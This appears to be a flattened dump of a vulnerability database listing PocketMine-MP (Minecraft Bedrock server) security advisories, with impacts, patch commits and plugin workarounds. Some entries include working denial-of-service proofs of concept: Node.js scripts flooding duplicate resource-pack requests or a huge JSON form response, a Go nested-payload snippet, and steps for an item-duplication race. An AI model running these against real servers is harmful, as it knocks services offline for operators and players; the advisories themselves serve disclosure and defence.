| Affected_by_vulnerabilities |
| 0 |
| url |
VCID-21se-t8q9-yudv |
| vulnerability_id |
VCID-21se-t8q9-yudv |
| summary |
PocketMine-MP server crash with certain invalid JSON payloads in `LoginPacket` due to dependency vulnerability (again)
### Impact
An attacker could crash PocketMine-MP by sending malformed JSON in `LoginPacket`.
This happened due to the particular handling of NULL types in the json mapper which accepts NULL type values in typed arrays which PocketMine-MP did not expect.
Code processing arrays in the JSON data could then crash due to unexpected `NULL` elements.
### Patches
This problem was fixed in 5.3.1 and 4.23.1 by updating JsonMapper to include the following commit: pmmp/netresearch-jsonmapper@4f90e8dab1c9df331fad7d3d89823404e882668c
An upstream patch for this issue was proposed via https://github.com/cweiske/jsonmapper/pull/211; however, as of 2024-05-15, the patch has not been accepted upstream due to debate about how to deal with the behavior. For now, a fork of JsonMapper is used by PocketMine-MP to workaround the issue.
### Workarounds
A plugin may handle `DataPacketReceiveEvent` for `LoginPacket` and check that none of the input arrays contain `NULL` where it's not expected, but this is rather cumbersome.
### References
Proposed upstream patch for a behavior change: https://github.com/cweiske/jsonmapper/pull/211 |
| references |
|
| fixed_packages |
|
| aliases |
GHSA-92jh-gwch-jq38, GMS-2023-2249
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-21se-t8q9-yudv |
|
| 1 |
| url |
VCID-2sbu-jxum-5fce |
| vulnerability_id |
VCID-2sbu-jxum-5fce |
| summary |
Inability to de-op players if listed in ops.txt with non-lowercase letters |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:composer/pocketmine/pocketmine-mp@4.0.3 |
| purl |
pkg:composer/pocketmine/pocketmine-mp@4.0.3 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-21se-t8q9-yudv |
|
| 1 |
| vulnerability |
VCID-48ue-wv63-4ugn |
|
| 2 |
| vulnerability |
VCID-512n-rhbr-cqcy |
|
| 3 |
| vulnerability |
VCID-5ek8-52ek-sqc8 |
|
| 4 |
| vulnerability |
VCID-5nfj-srxx-8fh7 |
|
| 5 |
| vulnerability |
VCID-b96w-azrg-sqah |
|
| 6 |
| vulnerability |
VCID-drn3-hfmz-mbgj |
|
| 7 |
| vulnerability |
VCID-et56-qjpe-2yd6 |
|
| 8 |
| vulnerability |
VCID-fhba-frv3-nbak |
|
| 9 |
| vulnerability |
VCID-k8xn-bve5-duh7 |
|
| 10 |
| vulnerability |
VCID-nd23-6jpk-qkdx |
|
| 11 |
| vulnerability |
VCID-ntjs-ceva-8yas |
|
| 12 |
| vulnerability |
VCID-qgtx-5npy-q7c4 |
|
| 13 |
| vulnerability |
VCID-s99k-v9k6-tkhe |
|
| 14 |
| vulnerability |
VCID-ss78-eefn-77fx |
|
| 15 |
| vulnerability |
VCID-u9mw-pj6c-b3c4 |
|
| 16 |
| vulnerability |
VCID-v3u1-9zqz-s7h9 |
|
| 17 |
| vulnerability |
VCID-vdbj-qe43-jqhy |
|
| 18 |
| vulnerability |
VCID-vteg-jcfz-4qhs |
|
| 19 |
| vulnerability |
VCID-xjuq-7177-rfc1 |
|
| 20 |
| vulnerability |
VCID-ybn8-byz7-gqb5 |
|
| 21 |
| vulnerability |
VCID-yqdh-k9nx-bqbh |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/pocketmine/pocketmine-mp@4.0.3 |
|
|
| aliases |
GHSA-j5qg-w9jg-3wg3, GMS-2021-54
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-2sbu-jxum-5fce |
|
| 2 |
|
| 3 |
| url |
VCID-512n-rhbr-cqcy |
| vulnerability_id |
VCID-512n-rhbr-cqcy |
| summary |
PocketMine MP vulnerable to uncontrolled resource consumption via mismatched type of 'InventoryTransactionPacket'
### Impact
A "mismatch" type `InventoryTransactionPacket` is sent by the client to request a resync of all currently open inventories.
Since PocketMine-MP does not rate-limit these "mismatch" transactions, and the syncing of inventories is not deferred until, e.g. the end of the current tick, they can be used as a very cheap bandwidth multiplier by making the server send out many MB of data (network serialized inventory items can be very large, especially when dealing with large amounts of NBT).
This is not currently known to have been exploited in the wild.
### Patches
This problem was fixed in 4.18.0-ALPHA2 by ca6d51498f12427a947467da8fcad7811418e6cc alongside the introduction of the `ItemStackRequest` system implementation.
### Workarounds
Plugins can handle `DataPacketReceiveEvent` for `InventoryTransactionPacket` and check if the type is `MismatchTransactionData`. If it is, apply some kind of rate limit (e.g. max 1 per tick). |
| references |
|
| fixed_packages |
|
| aliases |
GHSA-42qm-8v8m-m78c, GMS-2023-1728
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-512n-rhbr-cqcy |
|
| 4 |
| url |
VCID-5ek8-52ek-sqc8 |
| vulnerability_id |
VCID-5ek8-52ek-sqc8 |
| summary |
PocketMine-MP has LogDoS by many junk properties in client data JWT in LoginPacket
### Impact
Attackers can fill the body of the clientData JWT in LoginPacket with lots of junk properties, causing the server to flood warning messages, as well as wasting CPU time.
This happens because the JsonMapper instance used to process the JWT body is configured to warn on unexpected properties instead of rejecting them outright. While this behaviour increases flexibility for random changes introduced by Microsoft, it also creates vulnerabilities if not handled carefully.
This vulnerability affects PocketMine-MP servers exposed to a public network where unknown actors may have access.
### Patches
This issue was fixed in c1d4a813fb8c21bfd8b9affd040da864b794df71 by restricting the number of unknown properties to 10, and rejecting the packet if this limit is exceeded. This continues to tolerate random additions to the JWT between versions, while preventing the logger from being abused by clients to slow down the server.
### Workarounds
Plugins can handle `DataPacketReceiveEvent` to capture `LoginPacket`, and pre-process the clientData JWT to ensure it doesn't have any unusual properties in it. This can be achieved using `JsonMapper` (see the original affected code below) and setting the `bExceptionOnUndefinedProperty` flag to `true`. A `JsonMapper_Exception` will be thrown if the JWT is problematic.
However, it's important to caveat that this approach may cause login failures if any unexpected properties appear out of the blue in future versions (which has happened in the past).
### References
Affected code:
https://github.com/pmmp/PocketMine-MP/blob/5.41.1/src/network/mcpe/handler/LoginPacketHandler.php#L289-L303
https://github.com/pmmp/PocketMine-MP/blob/5.41.1/src/network/mcpe/handler/LoginPacketHandler.php#L334-L350 |
| references |
|
| fixed_packages |
|
| aliases |
GHSA-xp4f-g2cm-rhg7
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-5ek8-52ek-sqc8 |
|
| 5 |
| url |
VCID-5nfj-srxx-8fh7 |
| vulnerability_id |
VCID-5nfj-srxx-8fh7 |
| summary |
PocketMine-MP: Player entities can still die and drop items in flaggedForDespawn state
### Summary
When an entity dies, the entity is flagged for despawn, but remains in the `World`'s entity table, meaning it's still accessible by doing `World->getEntity($entityId)` and other methods. The same is true of a player when quitting the server.
When a network packet arrives from a client to attack an entity, the handler fetches the entity using `World->getEntity($entityId)` without any checks if the entity is already marked for despawning. Depending on the timing, the entity in question might already be in the flagged-for-despawn state when the action is processed. This means that the death handler for the entity might be run multiple times, causing loot and XP to be dropped multiple times, among other potential side effects.
### Reproducing steps
To reproduce this vulnerability, two clients (Player A and Player B) are required.
Prerequisites:
- Player A (Victim): Must have the valuable items to be duplicated in their inventory and 1 HP (to ensure instant death).
- Player B (Attacker): Must be equipped with a weapon capable of dealing at least 1 damage.
Steps:
1. Player A and Player B stand next to each other.
2. Player A initiates the disconnect sequence (e.g., clicking "Disconnect" or "Exit to Menu").
3. Immediately after Player A triggers the disconnect (within a split-second window), Player B must attack and kill Player A.
4. Player A's character dies server-side, and their inventory drops on the ground.
5. Player B collects the dropped items.
6. Player A logs back into the server.
7. Result: Player A still possesses the original items in their inventory, while Player B holds the dropped copies.
### Patches
The issue was fixed in https://github.com/pmmp/PocketMine-MP/commit/c0719b76b18f2508143134e79bc9f1aa39109683 by adding checks for flagged-for-despawn entities in several affected locations.
While a cleaner fix would be to have `World`'s various entity accessing methods exclude flagged-for-despawn entities, this was deemed too risky for 5.x as it would require significant internal changes.
### Workarounds
Plugins can mitigate this issue on older versions by handling `EntityDamageByEntityEvent`, checking if the victim entity is flagged for despawn, and if so, cancelling the event. |
| references |
|
| fixed_packages |
|
| aliases |
GHSA-f9jp-856v-8642
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-5nfj-srxx-8fh7 |
|
| 6 |
|
| 7 |
|
| 8 |
| url |
VCID-et56-qjpe-2yd6 |
| vulnerability_id |
VCID-et56-qjpe-2yd6 |
| summary |
PocketMine-MP versions prior to 4.18.1 contain an improper input validation vulnerability in inventory transaction handling. A remote attacker with a valid player session can request that the server drop more items than are available in the player's hotbar, triggering a server crash and resulting in denial of service. |
| references |
|
| fixed_packages |
|
| aliases |
CVE-2023-7332, GHSA-h87r-f4vc-mchv, GMS-2023-1797
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-et56-qjpe-2yd6 |
|
| 9 |
|
| 10 |
| url |
VCID-k8xn-bve5-duh7 |
| vulnerability_id |
VCID-k8xn-bve5-duh7 |
| summary |
PocketMine-MP has improperly handled dye colour IDs in banner NBT, leading to server crash
### Impact
`DyeColorIdMap->fromId()` did not account for the possibility that it might be given invalid input. This means that an undefined offset error would occur whenever this happened.
This code is indirectly called during [`Banner->deserializeCompoundTag()`](https://github.com/pmmp/PocketMine-MP/blob/38d6284671e8b657ba557e765a6c29b24a7705f5/src/item/Banner.php#L104), which is invoked when deserializing any item NBT, whether from network or disk.
An attacker could use this bug to crash a server by providing NBT with invalid values for pattern colours in an inventory transaction, or by using `/give` to obtain an item with NBT like this.
### Patches
08b9495bce2d65a6d1d3eeb76e484499a00765eb
### Workarounds
This is quite difficult to work around via a plugin. Theoretically, it's possible to override the `Banner` item class from a plugin and validate the data before it reaches `deserializeCompoundTag()`.
### For more information
If you have any questions or comments about this advisory:
* Email us at [security@pmmp.io](mailto:security@pmmp.io) |
| references |
|
| fixed_packages |
|
| aliases |
GHSA-wqqv-jcfr-9f5g
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-k8xn-bve5-duh7 |
|
| 11 |
| url |
VCID-nd23-6jpk-qkdx |
| vulnerability_id |
VCID-nd23-6jpk-qkdx |
| summary |
PocketMine-MP: Network amplification vulnerability with `ActorEventPacket`
### Impact
The server handles `ActorEventPacket` to trigger consuming animations from vanilla clients when they eat food or drink potions.
This can be abused to make the server spam other clients, and to waste server CPU and memory. For every `ActorEventPacket` sent by the client, an animation event will be sent to every other player the attacker is visible to.
This is similar to various other vulnerabilities which were fixed in the network overhaul of PM4 (e.g. `AnimatePacket` and `LevelSoundEventPacket`), but somehow this one slipped through the net.
### Patches
The problem was addressed in aeea1150a772a005b92bd418366f1b7cf1a91ab5 by changing the mechanism for consuming animations to be fully controlled by the server. `ActorEventPacket` from the client is now discarded.
### Workarounds
A plugin could use `DataPacketDecodeEvent` to rate-limit `ActorEventPacket` to prevent the attack. |
| references |
|
| fixed_packages |
|
| aliases |
GHSA-7hmv-4j2j-pp6f
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-nd23-6jpk-qkdx |
|
| 12 |
|
| 13 |
| url |
VCID-qgtx-5npy-q7c4 |
| vulnerability_id |
VCID-qgtx-5npy-q7c4 |
| summary |
PocketMine-MP vulnerable to server crash with certain invalid JSON payloads in `LoginPacket` due to vulnerable dependency
### Impact
An attacker could crash PocketMine-MP by sending malformed JSON in `LoginPacket`.
This happened due to a bug in [`netresearch/jsonmapper`](https://github.com/cweiske/JsonMapper). The library wasn't doing proper checks when mapping JSON arrays and objects onto scalar model properties such as strings.
### Patches
The problem was fixed in a fork of JsonMapper in dktapps/JsonMapper@a31902a31f5b6fdb832f57c0e3a3f16a3b41c012. PocketMine-MP releases 4.20.5 and 4.21.1 have been released with the fix.
### Workarounds
- Users of PocketMine-MP source installations may manually install the patched version of JsonMapper by backporting commit pmmp/PocketMine-MP@09668a37d66c6023685a948b7550c918620e98f2.
- A plugin may also be able to workaround this issue by using `DataPacketReceiveEvent` to attempt detection of suspicious payloads. An `ErrorException` will be thrown in the crash case, which can be caught by plugins.
### References
cweiske/jsonmapper#210 |
| references |
|
| fixed_packages |
|
| aliases |
GHSA-pqp3-8rrw-g8vm, GMS-2023-1798
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-qgtx-5npy-q7c4 |
|
| 14 |
| url |
VCID-s99k-v9k6-tkhe |
| vulnerability_id |
VCID-s99k-v9k6-tkhe |
| summary |
PocketMine-MP: LogDoS by large complex unknown property logging in clientData in LoginPacket
### Impact
Attackers can put large and/or complex structures as a value to an unknown property in the clientData JWT body in the Minecraft `LoginPacket`, causing the server to generate very long log messages.
Additionally, the property name is logged without any length limitations or sanitization, which can also be abused for LogDoS.
This may be used to spam the log/console, waste CPU time serializing the offending structure, and potentially to crash the server entirely.
This happens because the JsonMapper instance used to process the JWT body is configured to warn on unexpected properties instead of rejecting them outright. While this behaviour increases flexibility for random changes introduced by Microsoft, it also creates vulnerabilities if not handled carefully.
This vulnerability affects PocketMine-MP servers exposed to a public network where unknown actors may have access.
### PoC
1. Connect to the server using a custom client.
2. Send a Minecraft `LoginPacket` containing an unexpected JSON property (e.g., invalid_key) within the ClientData.
3. Set the value of invalid_key to a highly recursive or massive object structure (e.g., an array containing millions of elements or deeply nested arrays).
4. The server hits the `warnUndefinedJsonPropertyHandler`, which attempts to var_export the malicious object, leading to an Out-of-Memory crash.
```
A := make([]interface{}, 1)
ptr := &A
for i := 0; i < 500; i++ {
next := make([]interface{}, 1000)
(*ptr)[0] = next
ptr = &next
}
data := make([]int, 2000000)
for i := 0; i < 100; i++ {
data[i] = i
}
(*ptr)[0] = data
d.PlayFabID = A
```
### Patches
The issue was addressed in https://github.com/pmmp/PocketMine-MP/commit/87d1c0cea09d972fd4c2fafb84dac2ecab7649f0 by removing the relevant `var_export` and limiting the length of the logged property name to 80 characters.
### Workarounds
Plugins can handle `DataPacketReceiveEvent` to capture `LoginPacket`, and pre-process the clientData JWT to ensure it doesn't have any unusual properties in it. This can be achieved using `JsonMapper` (see the original affected code below) and setting the `bExceptionOnUndefinedProperty` flag to `true`. A `JsonMapper_Exception` will be thrown if the JWT is problematic.
However, it's important to caveat that this approach may cause login failures if any unexpected properties appear out of the blue in future versions (which has happened in the past). |
| references |
|
| fixed_packages |
|
| aliases |
GHSA-h6rj-3m53-887h
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-s99k-v9k6-tkhe |
|
| 15 |
| url |
VCID-ss78-eefn-77fx |
| vulnerability_id |
VCID-ss78-eefn-77fx |
| summary |
Uncapped length of skin data fields submitted by players |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:composer/pocketmine/pocketmine-mp@4.0.5 |
| purl |
pkg:composer/pocketmine/pocketmine-mp@4.0.5 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-21se-t8q9-yudv |
|
| 1 |
| vulnerability |
VCID-48ue-wv63-4ugn |
|
| 2 |
| vulnerability |
VCID-512n-rhbr-cqcy |
|
| 3 |
| vulnerability |
VCID-5ek8-52ek-sqc8 |
|
| 4 |
| vulnerability |
VCID-5nfj-srxx-8fh7 |
|
| 5 |
| vulnerability |
VCID-b96w-azrg-sqah |
|
| 6 |
| vulnerability |
VCID-drn3-hfmz-mbgj |
|
| 7 |
| vulnerability |
VCID-et56-qjpe-2yd6 |
|
| 8 |
| vulnerability |
VCID-fhba-frv3-nbak |
|
| 9 |
| vulnerability |
VCID-k8xn-bve5-duh7 |
|
| 10 |
| vulnerability |
VCID-nd23-6jpk-qkdx |
|
| 11 |
| vulnerability |
VCID-ntjs-ceva-8yas |
|
| 12 |
| vulnerability |
VCID-qgtx-5npy-q7c4 |
|
| 13 |
| vulnerability |
VCID-s99k-v9k6-tkhe |
|
| 14 |
| vulnerability |
VCID-u9mw-pj6c-b3c4 |
|
| 15 |
| vulnerability |
VCID-v3u1-9zqz-s7h9 |
|
| 16 |
| vulnerability |
VCID-vdbj-qe43-jqhy |
|
| 17 |
| vulnerability |
VCID-vteg-jcfz-4qhs |
|
| 18 |
| vulnerability |
VCID-ybn8-byz7-gqb5 |
|
| 19 |
| vulnerability |
VCID-yqdh-k9nx-bqbh |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/pocketmine/pocketmine-mp@4.0.5 |
|
|
| aliases |
GHSA-c6fg-99pr-25m9, GMS-2022-3
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-ss78-eefn-77fx |
|
| 16 |
|
| 17 |
|
| 18 |
| url |
VCID-vdbj-qe43-jqhy |
| vulnerability_id |
VCID-vdbj-qe43-jqhy |
| summary |
PocketMine-MP allows malicious client data to waste server resources due to lack of limits for explode()
### Impact
Due to lack of limits by default in the [`explode()`](https://www.php.net/manual/en/function.explode.php) function, malicious clients were able to abuse some packets to waste server CPU and memory.
This is similar to a previous security issue published in https://github.com/pmmp/PocketMine-MP/security/advisories/GHSA-gj94-v4p9-w672, but with a wider impact, including but not limited to:
- Sign editing
- LoginPacket JWT parsing
- Command parsing
However, the estimated impact of these issues is low, due to other limits such as the packet decompression limit.
### Patches
The issue was fixed in 5.25.2 via d0d84d4c5195fb0a68ea7725424fda63b85cd831.
A custom PHPStan rule has also been introduced to the project, which will henceforth require that all calls to `explode()` within the codebase must specify the `limit` parameter.
### Workarounds
No simple way to fix this.
Given that sign editing is the easiest way this could be exploited, workarounds could include plugins pre-processing `BlockActorDataPacket` to check that the incoming text doesn't have more than 4 parts when split by `\n`. |
| references |
|
| fixed_packages |
|
| aliases |
GHSA-g274-c6jj-h78p
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-vdbj-qe43-jqhy |
|
| 19 |
| url |
VCID-vteg-jcfz-4qhs |
| vulnerability_id |
VCID-vteg-jcfz-4qhs |
| summary |
PocketMine-MP `ResourcePackDataInfoPacket` amplification vulnerability due to lack of resource pack sequence status checking
### Summary
A denial-of-service / out-of-memory vulnerability exists in the `STATUS_SEND_PACKS` handling of `ResourcePackClientResponsePacket`.
PocketMine-MP processes the `packIds` array without verifying that all entries are unique.
A malicious (non-standard) Bedrock client can send multiple duplicate valid pack UUIDs in the same `STATUS_SEND_PACKS` packet, causing the server to send the same pack multiple times. This can quickly exhaust memory and crash the server.
Severity: **High** — Remote DoS from an authenticated client.
---
### Details
Relevant code (simplified):
```php
case ResourcePackClientResponsePacket::STATUS_SEND_PACKS:
foreach($packet->packIds as $uuid){
$splitPos = strpos($uuid, "_");
if($splitPos !== false){
$uuid = substr($uuid, 0, $splitPos);
}
$pack = $this->getPackById($uuid);
if(!($pack instanceof ResourcePack)){
$this->disconnectWithError("Unknown pack $uuid requested...");
return false;
}
$this->session->sendDataPacket(ResourcePackDataInfoPacket::create(
$pack->getPackId(),
self::PACK_CHUNK_SIZE,
(int) ceil($pack->getPackSize() / self::PACK_CHUNK_SIZE),
$pack->getPackSize(),
$pack->getSha256(),
false,
ResourcePackType::RESOURCES
));
}
break;
```
**Root cause:**
* The `packIds` array is taken directly from the client packet and processed as-is.
* There is no check to ensure that all requested packs are unique.
* A malicious client can craft a `STATUS_SEND_PACKS` packet with many duplicates of a valid UUID.
* Each duplicate results in the server re-sending the same pack, consuming additional memory.
**Why this is unexpected:**
* Mojang's official clients never send duplicates in `packIds`.
* PocketMine assumes the client is well-behaved, but an attacker can bypass this with a custom client.
---
**Suggested fix:**
Before sending packs:
1. Remove duplicates from the incoming `packIds` array.
2. If the difference between the original count and unique count exceeds a small threshold (e.g. > 2 duplicates), immediately disconnect the client with an error.
3. Track which packs have already been sent to this player, and skip any that have already been transferred.
```php
$alreadySent = $this->packsSent ?? [];
// Remove duplicates
$uniquePackIds = array_unique($packet->packIds);
// Detect abuse
if(count($packet->packIds) - count($uniquePackIds) > 2){
$this->disconnectWithError("Too many duplicate resource pack requests");
return false;
}
foreach($uniquePackIds as $uuid){
if(in_array($uuid, $alreadySent, true)){
continue; // Skip packs already sent to this player
}
// existing code...
$alreadySent[] = $uuid;
}
$this->packsSent = $alreadySent;
```
---
### PoC
1. Join a PocketMine-MP server with at least one resource pack enabled.
2. Using a custom Bedrock client, send a `ResourcePackClientResponsePacket` with:
* `status = STATUS_SEND_PACKS`
* `packIds` = many duplicates of a known valid pack UUID.
Example Node.js PoC (requires `bedrock-protocol` and a valid `PACK_UUID`):
```js
import { createClient } from 'bedrock-protocol';
const host = '127.0.0.1';
const port = 19132;
const username = 'test';
const PACK_UUID = '00000000-0000-0000-0000-000000000000'; // replace with a real UUID
const DUPLICATES = 1000;
const client = createClient({
host,
port,
username,
offline: true
});
client.on('spawn', () => {
console.log('[*] Sending duplicate pack request...');
client.queue('resource_pack_client_response', {
response_status: 'send_packs',
resourcepackids: Array(DUPLICATES).fill(PACK_UUID)
});
});
```
---
### Impact
* **Type:** Remote Denial of Service / Memory Exhaustion
* **Who is impacted:** Any PocketMine-MP server with resource packs enabled
* **Requirements:** Attacker must connect to the server (authenticated player)
* **Effect:** Server memory rapidly increases, leading to freeze or crash |
| references |
|
| fixed_packages |
|
| aliases |
GHSA-fqqv-56h5-f57g
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-vteg-jcfz-4qhs |
|
| 20 |
| url |
VCID-xjuq-7177-rfc1 |
| vulnerability_id |
VCID-xjuq-7177-rfc1 |
| summary |
Book page text, count, and author/title length is not limited in PocketMine-MP |
| references |
|
| fixed_packages |
| 0 |
| url |
pkg:composer/pocketmine/pocketmine-mp@4.0.5 |
| purl |
pkg:composer/pocketmine/pocketmine-mp@4.0.5 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-21se-t8q9-yudv |
|
| 1 |
| vulnerability |
VCID-48ue-wv63-4ugn |
|
| 2 |
| vulnerability |
VCID-512n-rhbr-cqcy |
|
| 3 |
| vulnerability |
VCID-5ek8-52ek-sqc8 |
|
| 4 |
| vulnerability |
VCID-5nfj-srxx-8fh7 |
|
| 5 |
| vulnerability |
VCID-b96w-azrg-sqah |
|
| 6 |
| vulnerability |
VCID-drn3-hfmz-mbgj |
|
| 7 |
| vulnerability |
VCID-et56-qjpe-2yd6 |
|
| 8 |
| vulnerability |
VCID-fhba-frv3-nbak |
|
| 9 |
| vulnerability |
VCID-k8xn-bve5-duh7 |
|
| 10 |
| vulnerability |
VCID-nd23-6jpk-qkdx |
|
| 11 |
| vulnerability |
VCID-ntjs-ceva-8yas |
|
| 12 |
| vulnerability |
VCID-qgtx-5npy-q7c4 |
|
| 13 |
| vulnerability |
VCID-s99k-v9k6-tkhe |
|
| 14 |
| vulnerability |
VCID-u9mw-pj6c-b3c4 |
|
| 15 |
| vulnerability |
VCID-v3u1-9zqz-s7h9 |
|
| 16 |
| vulnerability |
VCID-vdbj-qe43-jqhy |
|
| 17 |
| vulnerability |
VCID-vteg-jcfz-4qhs |
|
| 18 |
| vulnerability |
VCID-ybn8-byz7-gqb5 |
|
| 19 |
| vulnerability |
VCID-yqdh-k9nx-bqbh |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/pocketmine/pocketmine-mp@4.0.5 |
|
|
| aliases |
GHSA-p62j-hrxm-xcxf, GMS-2022-4
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-xjuq-7177-rfc1 |
|
| 21 |
| url |
VCID-ybn8-byz7-gqb5 |
| vulnerability_id |
VCID-ybn8-byz7-gqb5 |
| summary |
PocketMine-MP: JSON decoding of unlimited size large arrays/objects in ModalFormResponse Handling
### Impact
The server does not meaningfully limit the size of the JSON payload in `ModalFormResponsePacket`. This can be abused by an attacker to waste memory and CPU on an affected server, e.g. by sending arrays with millions of elements.
The player must have a full session on the server (i.e. spawned in the world) to exploit this, as form responses are not handled unless the player is in game.
### Patches
The issue was fixed in two parts:
- cef1088341e40ee7a6fa079bca47a84f3524d877 limits the size of a single form response to 10 KB, which is well above expected size, but low enough to prevent abuse
- f983f4f66d5e72d7a07109c8175799ab0ee771d5 avoids decoding the form response if there is no form associated with the given ID
### Workarounds
This issue can be worked around in a plugin using `DataPacketReceiveEvent` by:
- checking the max size of the `formData` field
- making sure the form ID is not repeated
However, a full workaround for the issue would require reflection to access the `Player->forms` property, which is not exposed via any accessible API prior to 5.39.2.
### PoC
1. Join a PocketMine-MP server as a regular player (no special permissions needed).
2. Use a modified client or packet-sending script to send a `ModalFormResponsePacket` with:
* Any non-existent `formId`
* `formData` containing a massive JSON array (e.g., 10+ MB payload).
3. The server will attempt to parse the JSON and may freeze or become unresponsive.
Example NodeJS pseudocode:
```javascript
import { createClient } from 'bedrock-protocol';
const host = '127.0.0.1';
const port = 19132;
const username = 'Test';
const client = createClient({
host,
port,
username,
offline: true
});
const hugePayload = '[' + '0,'.repeat(5_000_000) + '0]';
client.on('spawn', () => {
console.log('[*] Connected & spawned. Sending malicious packet...');
client.write('modal_form_response', {
formId: 9999, // Form inexistant
formData: hugePayload // JSON énorme
});
console.log('[*] Packet sent. The server should start freezing shortly.');
});
``` |
| references |
|
| fixed_packages |
|
| aliases |
GHSA-788v-5pfp-93ff
|
| risk_score |
null |
| exploitability |
null |
| weighted_severity |
null |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-ybn8-byz7-gqb5 |
|
| 22 |
|
|
|---|